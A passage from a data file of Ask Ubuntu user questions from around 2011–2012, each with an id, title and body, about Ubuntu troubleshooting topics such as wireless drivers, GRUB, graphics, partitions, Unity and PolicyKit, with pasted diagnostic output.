17s ( 100 kb/s ) selecting previously deselected package cnijfilter-common . ( reading database ... 262781 files and directories currently installed . ) unpacking cnijfilter-common ( from ... /cnijfilter-common_3.50-2ubuntu4_amd64.deb ) ... selecting previously deselected package cnijfilter-mx420series . unpacking cnijfilter-mx420series ( from ... /cnijfilter-mx420series_3.50-2ubuntu4_amd64.deb ) ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... setting up cnijfilter-common ( 3.50-2ubuntu4 ) ... setting up cnijfilter-mx420series ( 3.50-2ubuntu4 ) ... processing triggers for libc-bin ... ldconfig deferred processing now taking place
97870	where is netbeans ?	i did some search and it appears that netbeans ide should be available through the ubuntu repositories . but it 's not ! i 'm wondering if i 'm mistaken by any chance and netbeans were never inside the repos !
97878	how do i force a secure reboot ?	when my ubuntu freezes , is there a way to force reboot other than to hit the hardware reset button on my computer in order to ensure as best as possible that i do n't corrupt any hard drive partition ? edit : what do i do if i ca n't even access the terminal ?
97879	how do you get install alonside ubuntu option during the installation ?	during the graphical installation i get only two options in the allocate disk space page , i ) erase disk and install ubuntu ii ) something else . i just do n't get the third option which is iii ) install ubuntu alongside them . what do i need to do to get them ? https : //help.ubuntu.com/community/graphicalinstall
97881	how to use gparted to resize hdd ?	i installed gparted as i used to in 7.10 and was going to resize my partion when i saw that i ca n't resize my ubuntu os partion . i used to do it in 7.10 to dual-boot with windows . but i 'm locked out or something . i do not have the root acces to change the hdd . what do i have to do to make it possible ?
97885	ubuntu 10.04 lts 64bit only showing 2.9gb of memory	i have installed ubuntu 10.04 lts ( 64bit ) on my lenovo thinkpad x60 ( core 2 duo t5600 ) . i installed 4gb of ram before installing ubuntu , but when i check the available memory in ubuntu it says that only 2.9gb is installed . i have checked the bios and it shows the full 4gb of ram . any help with this would be appreciated .
97886	is there a clipboard manager with paste all functionality ?	does any of the linux clipboard managers have the feature paste all ? a simple scenario : 1 . copy first piece of text . 2 . copy second piece of text . 3 . copy n-th piece of text . 4 . command the clipboard manager to paste all of the copied text pieces . the same ability for images or a combination of text and images would be useful as well but let 's simplify to text only case . i tried few of the recommended applications and have n't found this in neither of them . p.s . i use ubuntu 11.10 , so gnome programs are preferred .
97887	ca n't use adobe flash player - local storage	whenever i try to accept adobe to store information om my computer it does absolutely nothing . this is what it say 's : adobe flash player settings local storage s.ytimg.com is requesting permission to store information on your computer . requested : up to 10 kb currently used : 0 kb allow | deny can i set it to allow as default in firefox 's settings ?
97888	dell latitude e6510 black screen after last update on 11.10 intel graphics	after last friday ( 20/01/2012 ) update , when i turned on my laptop today i got a black screen on it . it is on , i can see the back light , but it 's all black only my secondary display is ok. screen is ok , when i reboot i can see dell logo a ubuntu colored screen before login but then ... black . i need to attach secondary monitor to do anything . i saw a lot of issues with nvidia but mine is intel graphics . i was already on 11.10 just did an update . any thoughts ?
97889	how do i create a boot disk from an existing installation ?	i want to make a boot cd that when used can run ( without installing ) an copy of ubuntu already installed on my system with all the same preferences and programs as the version i am using at the moment . i am running version 11.10 if it matters .
97894	slow gui performance using a radeon hd5770	i 'm fresh ubuntu user . my pc is pretty fast ( phenom x4 3.6ghz/hd5770/4gb ram ) so i was very disappointed when firstly saw how laggy is the interface - lags when i try to move any window . i think my problem is caused by graphics drivers but i have no idea how to resolve it ... i tried to install and uninstall fglrx on every way i found but it did n't help . it 's the same both on x64 and x86 ubuntu . ( sorry if my english is bad ; ) ) i installed propierty drivers from ubuntu system settings ( jockey ? ) and from amd website through console - both were the same laggy . i think those were the newest one - amd catalystâ˘ 11.11 proprietary linux x86 display driver i have noticed that everything runs smoothly when i run ubuntu from liveusb setting `` sync to vblank '' to off in compiz manager doesnt help too ...
97897	add bash script folder to path ?	i have some bash scripts in an application folder that i 'd like to use as if they were on my path . if they were straight-up applications , i 'd just add the directory to ~/.bashrc , but these are scripts . eg : ~/a_dir/another_dir/foo.sh ~/a_dir/another_dir/foo-gui.sh is there a good way to set up a path so that i can use them from any directory ? eg : totally/different/path $ bash foo.sh
97903	how can i get a `` busy '' status option in the me menu ?	i can control my im status using me menu in gnome shell . the status options i have are available and unavailable . i 'd like to control my status just i do in empathy , but i do not have the full list of statuses : if i open an empathy i 'd get the busy status added to list as well . is this a bug or some kind of configuration i am missing ? i have been using gnome shell 3.2 from this repository .
97908	get album with covers when syncronizing with ipod	i have 120gb ipod classic . firmware 2.01 . it will connect without any problems with ubuntu , sync albums both via clementine and rhythmbox , but covers will not sync ? gtkpod kind of freezes the pc , so it was not useful for me . only amarok will sync songs with their covers , but is very slow in recognizing the ipod . it installs too much kde dependencies , which often render the system unusable . any ideas if this can be fixed ( sync albums with artwork ) ?
97909	what happens when there are 2 versions of a terminal command installed ?	for example , i have openjdk 6 and 7 both installed . if i run javac foo.java will is compile my program as a java 6 program or a java 7 program ?
97910	can not enable wireless on an intel wifilink 1000 on an lenovo ideapad z570	i am using the ubuntu 11.10 on lenovo ideapad z570 . my wireless internet is not working . i have ensure that wireless switch is on . windows 7 , wireless works great.however ubuntu 11.10 is not allowing me to enable wireless connection . i have run the following command and here is the status . sudo lshw -class network *-network disabled description : wireless interface product : centrino wireless-n 1000 vendor : intel corporation physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 74 : e5:0b:1c : a4 : a4 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=iwlagn driverversion=3.0.0-12-generic firmware=39.31.5.1 build 35138 latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:42 memory : d0500000-d0501fff *-network description : ethernet interface product : rtl8101e/rtl8102e pci express fast ethernet controller vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth0 version : 05 serial : f0 : de : f1:64 : b6:62 size : 10mbit/s capacity : 100mbit/s width : 64 bits clock : 33mhz capabilities : pm msi pciexpress msix vpd bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=r8169 driverversion=2.3lk-napi duplex=half firmware=rtl_nic/rtl8105e-1.fw latency=0 link=no multicast=yes port=mii speed=10mbit/s resources : irq:41 ioport:2000 ( size=256 ) memory : d0404000-d0404fff memory : d0400000-d0403fff here is rfkill list all output : rfkill list all 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : phy0 : wireless lan soft blocked : no hard blocked : no 2 : acer-wireless : wireless lan soft blocked : yes hard blocked : no note : windows 7 , wireless card property shows that intel wifilink 1000 bgn . could someone help me to fix this issue .
97913	microsoft lifecam nx-6000 not working in ubuntu 11.10 64 bit	i am facing some issues with my webcam and i need some help because i have tried everything but i ca n't get it work . i have installed libv4l-0 and cheese webcam booth , but my webcam still does n't work.i have tried to plug it in different usb ports but still nothing . when i run dmesg | grep uvc command in terminal i get this : dmesg | grep uvc [ 56.343062 ] uvcvideo : found uvc 1.00 device microsoft速 lifecam nx-6000 ( 045e:00f8 ) [ 56.343418 ] uvcvideo : uvc non compliance - get_def ( probe ) not supported . enabling workaround . [ 56.344165 ] usbcore : registered new interface driver uvcvideo [ 69.528571 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . [ 69.528694 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . [ 684.265874 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . [ 684.266495 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . [ 684.267117 ] uvcvideo : failed to query ( 129 ) uvc probe control : 0 ( exp . 26 ) . [ 684.268370 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . [ 684.269370 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . [ 684.269993 ] uvcvideo : failed to query ( 129 ) uvc probe control : 0 ( exp . 26 ) . [ 983.936746 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . [ 983.936869 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . [ 1310.904475 ] uvcvideo : found uvc 1.00 device microsoft速 lifecam nx-6000 ( 045e:00f8 ) [ 1310.904817 ] uvcvideo : uvc non compliance - get_def ( probe ) not supported . enabling workaround . [ 1331.600728 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . [ 1331.600851 ] uvcvideo : failed to query ( get_def ) uvc control 2 on unit 5 : 0 ( exp . 2 ) . and when i run lsusb i get this : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 003 device 002 : id 046d : c52b logitech , inc. unifying receiver bus 008 device 002 : id 045e:070f microsoft corp . bus 001 device 005 : id 045e:00f8 microsoft corp. lifecam nx-6000 can anybody help please ?
97915	where are all ubuntu resources linked together ?	there 's a lot of pages if on wants to contribute to ubuntu : http : //harvest.ubuntu.com/ http : //developer.ubuntu.com/ http : //brainstorm.ubuntu.com/ http : //askubuntu.com http : //ubuntuforums.org https : //lists.ubuntu.com/ https : //launchpad.net/ubuntu how are they all interlinked and how do they facilitate organisation of teh community ? are they all equally watched by developers ? what is the first hand portal to submit improvements and get ones voice heard ? i find it currently a bit confusing . thanks in advance for clarifying .
97920	no support for in .icon folder in unity ?	iirc , gnome2 had the possibility to setup a .icon folder in your home directory and put some icons in it named as the executable you want it it assigned to . then nautilus would use this icon for the launchers . i tried this while running unity and it did not work . is this not possible in unity or did i just catch an app that does not work with custom icons ?
97924	levono b570 ca n't enable wlan	i´ve got the following problem on my new notebook : i installed ubuntu 11.10 and i can not enable wireless connection on network panel . i´m on the network panel ( part of system panel ) and cant switch the on/off button from `` off '' to `` on '' because it jumps instantly back to `` off '' i do n't know what to do , because i already had a stable wlan connection - 2 times ... but i do n't know what i´ve done to fix it . i have got no windows or other os on my notebook .
97926	wireless problem . i have looked through the tutorial !	i have just downloaded my first ubuntu version which is 11.10 . i now cant access my wireless . i have looked through the tutorial but it said i should see claimed , unclaimed , enabled or disabled ! none of that is there as you can see . i have downloaded ndiswrapper ! could someone point me in the right direction of how to solve this ? thanks ! this is sudo lshw -c network *-network description : network controller product : bcm4311 802.11b/g wlan vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:0b:00.0 version : 01 width : 32 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : driver=b43-pci-bridge latency=0 resources : irq:17 memory : fe8fc000-fe8fffff *-network description : ethernet interface product : bcm4401-b0 100base-tx vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:03:00.0 logical name : eth1 version : 02 serial : 00:19 : b9:7e:4b : c0 size : 10mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=b44 driverversion=2.0 duplex=half latency=64 link=no multicast=yes port=twisted pair speed=10mbit/s resources : irq:21 memory : fe5fe000-fe5fffff
97928	ubuntu on older laptop	i installed ubuntu on an older computer ( with pentium m processor ) and it is very slowly . i do n't think this is a bug , but just a too slow computer for the standard version . what can i deactivate or modify to get better performance for that computer ? update : /proc/cpuinfo : processor : 0 vendor_id : genuineintel cpu family : 6 model : 9 model name : intel ( r ) pentium ( r ) m processor 1500mhz stepping : 5 cpu mhz : 600.000 cache size : 1024 kb fdiv_bug : no hlt_bug : no f00f_bug : no coma_bug : no fpu : yes fpu_exception : yes cpuid level : 2 wp : yes flags : fpu vme de pse tsc msr mce cx8 mtrr pge mca cmov lflush dts acpi mmx fxsr sse sse2 tm pbe up bts est tm2 bogomips : 1199.03 clflush size : 64 cache_alignment : 64 address sizes : 32 bits physical , 32 bits virtual power management : free : total used free shared buffers cached mem : 508196 488212 19984 0 37608 183292 -/+ buffers/cache : 267312 240884 swap : 522236 13812 508424 df -t : dateisystem typ 1k‐blöcke benutzt verfügbar ben % eingehängt auf /dev/sda1 ext4 95635244 12192596 78584588 14 % / udev devtmpfs 247084 4 247080 1 % /dev tmpfs tmpfs 101640 780 100860 1 % /run none tmpfs 5120 0 5120 0 % /run/lock none tmpfs 254096 1164 252932 1 % /run/shm /dev/sr0 udf 4147606 4147606 0 100 % /media/disc
97931	grub 2 error : no such disk	i have gone through many pains to boot through my windows 7 partition . i had windows 7 , then one fine day i installed ubuntu and again formatted the partition where ubuntu was installed only to find the my windows does not boot ( probably corrupted mbr ) . i again installed ubuntu later but the grub could not detect windows . so i manually added windows by editing the file 40_custom . but when i select the win7 entry in the grub , it displays the error : no such disk . what do i do ? ? additional info : ubuntu version : 11.10 x64|| win 7 home premium , 64 bit|| while in the process of debugging i once also came across the error : sector 32 being in use by flexnet.|| strongly in need of booting my win 7 without any formats or fresh os installations . thankful for any diagnostics and solutions to my problem .
97936	terminal command to set audio volume ?	i have an external sound card which mostly works fine , except that when its first plugged in , or when i turn on my laptop , the volume gets set to 100 % . that is , the overall system volume , as shown in the sound indicator . what i 'm looking for is a terminal command that will set that volume to 50 % , so that i can run it on login and not have to worry that the first audio i play is going to blare out at me if i forget to turn the volume down . what commands allow you to change that volume , i.e . the one in the sound indicator ? i 've poked around in gsettings and dbus , but have been unable to find anything that would let me set the system volume like that . i do know about alsamixer , but that 's not the solution i 'm looking for , since that does n't allow me to change the volume using the sound indicator or my laptop 's multimedia keys .
97937	lubuntu hardware manager	so , i installed lubuntu minimal and built the system from there on the 11.10 packages . i 'm wondering what package it is that includes the hardware manager i remember from ubuntu 10.04 ? thanks !
97941	root filling up although it should have some space	this has been perplexing me for some time . i 'm on ubuntu 11.04 . my root partition is filling up and i ca n't figure out what 's causing it . even stranger , when i run df -h , this is the output : filesystem size used avail use % mounted on /dev/sda2 9.2g 8.8g 0 100 % / as you see , there should be about 400 mb free , but avail shows 0 . what could be causing this ? i 've even uninstalled some programs to free the space and it fills up again . suggestions on how to find out which , if any , files are filling up the space are also welcome .
97942	ubuntu 11.10 on asus k53ta laptop no screen error ?	i have an asus k53 laptop with a amd a6 apu and i cant seem to get the screen to work for gui mode . i can install it with the alternate cd but i can only see a blinking cursor then no screen detected error pops up for about a second . its got a radeon hd 6720g2 . i have also tried running `` startx '' in terminal mode but the same error was outputted . thanks for any help .
97944	how do i turn off alt-tab in unity ?	is there any way to turn off the way that unity handles alt-tab ? you know , to make it where alt-tab just switches through windows and does n't group them ?
97947	graphical environment does not start on a acer aspire one d255	i am running ubuntu 11.10 on an acer aspire one d255 netbook dual-booted with windows 7 starter using wubi . up until now , everything has worked perfectly . when i started ubuntu up today , instead of showing the purple loading screen , it showed me a terminal that was printing what appeared to be startup logs . no error showed , and eventually i was presented with a root prompt : `` root @ ubuntu : ~ # '' . i used the prompt to back up my important files to an external hard drive , but i would prefer not to have to reinstall it . does anyone have any ideas why it would do something like this ?
97948	why is the system log viewer blank ?	why is the system log viewer in unity 11.10 blank and there is no possibility to add any path to log files ? this empty useless window must have an equivalent ( which ? ) but why developers put it into the dash ? i have very fresh installation of the 64 bit system . could it be a bug ? my previous installation of the same system had the same issue . screenshot
97951	whats the meaning of `` gnewsense is based on ubuntu '' ?	i am beginner to linux and i am learning this . now i actually unable to understand when someone says that this distribution is based on this particular kernel . for eg . gnewsense id based on ubuntu or ubuntu is based on debian etc . so can anyone please tell what does this statement exactly means ? ?
97954	why is the size of my .private folder so large ?	last night i had about 190gb of free space on my 500gb hdd . today i have about 80gb free . i ran df and discovered that my /home/jon/.private folder is currently using 80 % of my hard drive . what . the . hell . i really do n't need to encrypt my files that bad . can anyone tell me why i 've lost so much space to this , and what i can do to recover as much free space as possible ? i realize that i 'm not going to get back 330-something odd gb of space , but i lost 100gb overnight . i 'm new enough to ubuntu ( and linux in general ) that i do n't want to proceed without a firm understanding of what 's going on here . thanks in advance , guys .
97955	how do i get libreoffice with presenter console to display notes and next slide ?	i am running libreoffice 3.4.3 with sun presenter console 1.0.3 on ubuntu 11.10 on a dell inspiron 1545 laptop . i would like to be able to view the notes for the current slide on my laptop while the slide is being presented full-screen through the attached projector . instead , all i can get on the laptop during a presentation is the normal view , where i have to manually advance to get from one slide to another . is there a way to configure my settings so the two displays stay in sync on the same slide but one shows notes and the other does n't ?
97958	how can i change my password ?	how can i change my password ? i have looked around ask ubuntu but have n't found anything promising . a few answers got me close , but the advice always came from a more advanced user . i am new to the world of linux however i feel i 'm following the directions 100 % . i love ubuntu & i 'm learning a lot of good information but i have been spending far to much energy & time on what should be easy .
97961	alternative to lightdm for multi-user machines ?	i run several multi-user machines and am having several issues with user management and security relating to lightdm in 11.10 , specifically : 1 ) shutdown is not working from either the desktop or the greeter screen if another user is logged in ( i would have expected a password/confirm screen ) ; 2 ) after several `` switch user '' operations , lightdm will sometimes fail and deliver a black screen wih a flashing curser ; 3 ) possibly most concerning from a security point of view , users are able to access other logged-in user 's desktop directly and without a password by using ctrl+alt switching between x-server instances ( first logged-in user is on ctrl+alt+f7 , second on ctrl+alt+f8 , etc ) . it does not appear that these issues are receiving attention so i 'm wondering if anyone has used an alternative ( such as gdm or lxdm ) that is more functional and secure and whether there are instructions for installing .
97964	no software installation	i7-2670qm , x64 , win7+ubuntu11.10+kubuntu11.10 since yesterday i can not install anything on kubuntu , because the package manager starts and then error : some other manager is working . but there is nothing , tried it just after start for updating the newer kernel , no go . what can i do ? also on ubuntu celestia shows its start-sreen , is loading something and fade away into nirvana . has somebody an idea , what to do to get this running ?
97965	is there a way to upgrade btrfs ?	do i need to upgrade a btrfs filesystem after upgrading ubuntu , like i would with zfs ?
97968	ubuntu is not recognizing cd-rom	when i insert a cd into my laptop running ubuntu 11.10 nothing happens , there is no device showing that i have inserted the cd . i 've read about mountind dev/cdrom and such but nothing of the sort seems to work .
97969	how do i install megatunix ?	i am attempting to install megatunix onto a laptop that i can plug into my car 's ecu to monitor and tweek the car 's performance . i downloaded the megatunix.deb file and opened it in software center . it says that libgtkglext1 is a missing dependancy and will not allow the install to proceed . i have 11.10 ( i386 ) installed . should i try an older version ( eg . 10.04 lts ) or is there a way to satisfy the dependancy issue ?
97971	grub2 can not see cloned ubuntu install	ive cloned my ubuntu installation , but can not get grub2 to see it . before i had the install on /dev/sda1 and a grub boot prtition on /dev/sda2 i copied them both to a new disk - now boot prtition is on /sdb1 and the cloned partition ( using gparted ) is on /sdb2 ive set the bios boot order ot boot from the driv ive copied to . at startup the first time it booted into the old install ( this was expected , since i hadnt changed the grub entries ) but now , while in my 'old ' installation , if i run grub-mkconfig it only finds the install on /dev/sda1 , and not its copy on /dev/sdb2 ive tried reinstalling grub from scratch but no joy ... .
97973	black screen when trying to run the livecd or install on an acer 5742z	since the 11.04 version , on live cd or on a instalation ubuntu does n't work . i install it , or launch the live cd and the screen is all black , no image . i know ubuntu its runing but the screen is still black and i do n't know how to fix it . i have an acer 5742z .
97975	insert subtitles permanently and convert video	i need to do two things with an .avi video : insert subtitles ( .srt ) permanently without modifying its timing or the video intself . convert the new video ( with the permanent subtitles ) from .avi to .mpeg . is there any way to do it in one or two command lines ? ( probably using ffmpeg ? ) some additional data : subtitles could have some special characters ( spanish characters , like : ñ , á , ü ... ) does n't matter the order of events : first add subtitles to .avi and then convert or first convert and then add subtitles to .mpeg i 'm using ubuntu 11.04 ( natty narwhal ) .
97976	customizer freezes on ubuntu 11.10 using 32 bit or 64 bit iso	i downloaded customizer 3.2.1 from ppa : customizer-dev-team/devel and ran the application through the terminal so i could see the output . i have tried both 32 bit and 64 bit isos , but once the isos are selected the file browser closes but all the buttons stay grayed out . i have tried both 32 bit and 64 bit isos of ubuntu 11.10 from the ubuntu website . they have been tested for integrity . here is the terminal output up to the time the program crashed : williamt @ fatalerror-hp-ubuntu : ~ $ gksudo /home/williamt/1/gui.gambas ===================== get_str ( ) begin ===================== [ debug ] srchfile : /opt/customizer/settings.conf` [ debug ] srchstr : work_dir= [ debug ] def : /home [ debug ] loading file : /opt/customizer/settings.conf ================== get_str ( ) end ( found ) ================== ===================== get_str ( ) begin ===================== [ debug ] srchfile : /opt/customizer/settings.conf [ debug ] srchstr : work_dir= [ debug ] def : /home [ debug ] loading file : /opt/customizer/settings.conf ================== get_str ( ) end ( found ) ================== ===================== get_str ( ) begin ===================== [ debug ] srchfile : /opt/customizer/settings.conf [ debug ] srchstr : work_dir= [ debug ] def : /home [ debug ] loading file : /opt/customizer/settings.conf ================== get_str ( ) end ( found ) ================== [ event ] checking configuration file [ event ] checking essential directories and files [ event ] disabling widgets ===================== get_str ( ) begin ===================== [ debug ] srchfile : /opt/customizer/settings.conf [ debug ] srchstr : iso= [ debug ] def : [ debug ] loading file : /opt/customizer/settings.conf ================== get_str ( ) end ( found ) ================== =================== replace_str ( ) begin =================== [ debug ] srchfile : /opt/customizer/settings.conf [ debug ] srchstr : iso= [ debug ] rpcstr : /home/williamt/downloads/ubuntu-11.10-desktop-amd64 ( 1 ) .iso [ debug ] loading file : /opt/customizer/settings.conf [ debug ] saving file : /opt/customizer/settings.conf ================ replace_str ( ) end ( found ) ================ [ debug ] extracting iso [ event ] detecting terminal emulator [ event ] checking essential directories and files [ event ] disabling widgets this is really puzzling to me . any help will be greatly appreciated .
97982	intel 82801db pro/100 ve ethernet not connecting but wireless works great	i did a first time install of ubuntu 11.10 using wubi and the ethernet connection on my laptop . ( so i know that the ethernet interface is working and connected correctly ) . i finished the install and booted up ubuntu . the wireless connection works fine , but i am not able to get the wired connection to work . here is the output of ifconfig for eth0 : eth0 link encap : ethernet hwaddr 00:08:0d:0e:88 : c3 inet6 addr : fe80 : :208 : dff : fe0e:88c3/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:391 errors:0 dropped:0 overruns:0 frame:0 tx packets:84 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:25591 ( 25.5 kb ) tx bytes:23899 ( 23.8 kb ) and here is the output for lshw : user @ ubuntu : ~ $ sudo lshw -class network [ sudo ] password for user : *-network:0 description : wireless interface product : ar5212/ar5213 multiprotocol mac/baseband processor vendor : atheros communications inc. physical id : 5 bus info : pci @ 0000:01:05.0 logical name : wlan0 version : 01 serial : 00:90:96:7c:9e:56 width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=ath5k driverversion=3.0.0-12-generic firmware=n/a latency=168 link=no maxlatency=28 mingnt=10 multicast=yes wireless=ieee 802.11bg resources : irq:22 memory : cfff0000-cfffffff *-network:1 description : ethernet interface product : 82801db pro/100 ve ( mob ) ethernet controller vendor : intel corporation physical id : 8 bus info : pci @ 0000:01:08.0 logical name : eth0 version : 83 serial : 00:08:0d:0e:88 : c3 size : 100mbit/s capacity : 100mbit/s width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical tp mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=e100 driverversion=3.5.24-k2-napi duplex=full firmware=n/a latency=64 link=yes maxlatency=56 mingnt=8 multicast=yes port=mii speed=100mbit/s resources : irq:20 memory : cffef000-cffeffff ioport : cf40 ( size=64 ) it looks like the hardware is recognized and there is a driver attached to it . i only see an inet6 addr for eth0 , but no inet addr . manually configuring the ip addr is not desirable . i would like the dhcp to work correctly . any ideas for further debug or fixing this appreciated .
97987	ca n't get wireless to work hp dv900 , broadcom bcm4311 . i 'm new to linux and ubuntu please help !	lspci output : 00:00.0 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.1 ram memory : nvidia corporation c51 memory controller 0 ( rev a2 ) 00:00.2 ram memory : nvidia corporation c51 memory controller 1 ( rev a2 ) 00:00.3 ram memory : nvidia corporation c51 memory controller 5 ( rev a2 ) 00:00.4 ram memory : nvidia corporation c51 memory controller 4 ( rev a2 ) 00:00.5 ram memory : nvidia corporation c51 host bridge ( rev a2 ) 00:00.6 ram memory : nvidia corporation c51 memory controller 3 ( rev a2 ) 00:00.7 ram memory : nvidia corporation c51 memory controller 2 ( rev a2 ) 00:02.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:03.0 pci bridge : nvidia corporation c51 pci express bridge ( rev a1 ) 00:05.0 vga compatible controller : nvidia corporation c51 [ geforce go 6150 ] ( rev a2 ) 00:09.0 ram memory : nvidia corporation mcp51 host bridge ( rev a2 ) 00:0a.0 isa bridge : nvidia corporation mcp51 lpc bridge ( rev a3 ) 00:0a.1 smbus : nvidia corporation mcp51 smbus ( rev a3 ) 00:0a.3 co-processor : nvidia corporation mcp51 pmu ( rev a3 ) 00:0b.0 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0b.1 usb controller : nvidia corporation mcp51 usb controller ( rev a3 ) 00:0d.0 ide interface : nvidia corporation mcp51 ide ( rev f1 ) 00:0e.0 ide interface : nvidia corporation mcp51 serial ata controller ( rev f1 ) 00:10.0 pci bridge : nvidia corporation mcp51 pci bridge ( rev a2 ) 00:10.1 audio device : nvidia corporation mcp51 high definition audio ( rev a2 ) 00:14.0 bridge : nvidia corporation mcp51 ethernet controller ( rev a3 ) 00:18.0 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] hypertransport technology configuration 00:18.1 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] address map 00:18.2 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] dram controller 00:18.3 host bridge : advanced micro devices [ amd ] k8 [ athlon64/opteron ] miscellaneous control 07:05.0 firewire ( ieee 1394 ) : ricoh co ltd r5c832 ieee 1394 controller 07:05.1 sd host controller : ricoh co ltd r5c822 sd/sdio/mmc/ms/mspro host adapter ( rev 19 ) 07:05.2 system peripheral : ricoh co ltd r5c592 memory stick bus host adapter ( rev 0a ) 07:05.3 system peripheral : ricoh co ltd xd-picture card controller ( rev 05 )
97989	can not remove awn and desktop messed up	i recently installed awn after reading an article on omgubuntu . it looked very good in the pictures but i didnt like it at all . i couldent remove it and it replaced the status bar and the applications menu . i went into the settings and told it to not begin on startup , rebooted , and logged into a destop with no menu bar , applications , and i 'm limited to a few folders on my desktop and terminal . please help ! !
97992	gnome shell broken / nautilus menu appears at top of screen after setting up edgebound desktop	whenever i boot into gnome classic ( i am following this guide to set up edgebound desktop ) my main view is just a top bar with no clock or date on it , but it says `` file edit view go bookmarks help '' and i have the side dock which is from unity , but other than that it does n't seem like gnome 3 is working properly and i ca n't figure out why . i also tried logging into just gnome : same problem except no unity side bar . any help or advice would be appreciated . the problems are as follows : nautilus menu is still present , no clock , etc shows up in the bar just `` file edit view , etc '' the side bar is the same as unity 's and behaves the same way in other words it 's acting as if gnome 3 is n't present at all even though that 's the session i am in . more details - running this with nvidia restricted drivers , dual monitor setup set for twinview gnome classic gnome
97993	how to make abiword default in 11.10 ?	in earlier releases i could do that by right-clicking on a document file , going to properties - > open with and selecting abiword , but in 11.10 i ca n't see abiword as an option . how can i now make it the default application for opening my doc/docx files ?
97995	install samba 3.0.24 on ubuntu server 10.04 from source	has anyone had any luck compiling and installing samba 3.0.24 on ubuntu 10.04 ? i 'm trying to set up realtime virus scanning on samba shares ( clamav ) using the legacy version of samba as it is the latest release supported by samba-vscan-0.3.6b . i 'm no expert at this but i think i have all of the dependencies covered and i 'm following the documentation with the source code but i 'm getting errors as if there is a problem with the source code . i downloaded the source directly from http : //ftp.samba.org/pub/samba/stable/samba-3.0.24.tar.gz after running ./configure and make , i get the following error . compiling client/mount.cifs.c client/mount.cifs.c : in function ‘main’ : client/mount.cifs.c:1068 : error : ‘path_max’ undeclared ( first use in this function ) client/mount.cifs.c:1068 : error : ( each undeclared identifier is reported only once client/mount.cifs.c:1068 : error : for each function it appears in . ) make : *** [ client/mount.cifs.o ] error 1 you can view the full output log here . can anyone help me get this installed or suggest another means of implementing realtime virus scanning on samba shares ?
98006	how do i prevent policykit from asking for a password ?	for years , i 've had the following in my sudoers file : scott all=nopasswd : all for those who do n't know , this prevents sudo and friends ( gksudo , etc . ) from asking for a password . however , over the years , more and more stuff that once used sudo has been switched to using policykit . i 'm looking for an equivalent configuration for policykit , such that it 'll never ask me for my password . for those who do n't like my request , let me say this : i understand the reasons for the default configuration , and they are sound . i also understand the risks inherent in the configuration i want to make . nevertheless , it 's the way i want to set up my system . those who do n't fully understand the above should n't attempt what i 'm attempting .
98008	internal speakers not functioning after removing headphone	i am using ubuntu 11.10 . i have a sony vaio vpcea23en laptop . the problem is when i detach the headphone from jack , the internal speakers do n't function .
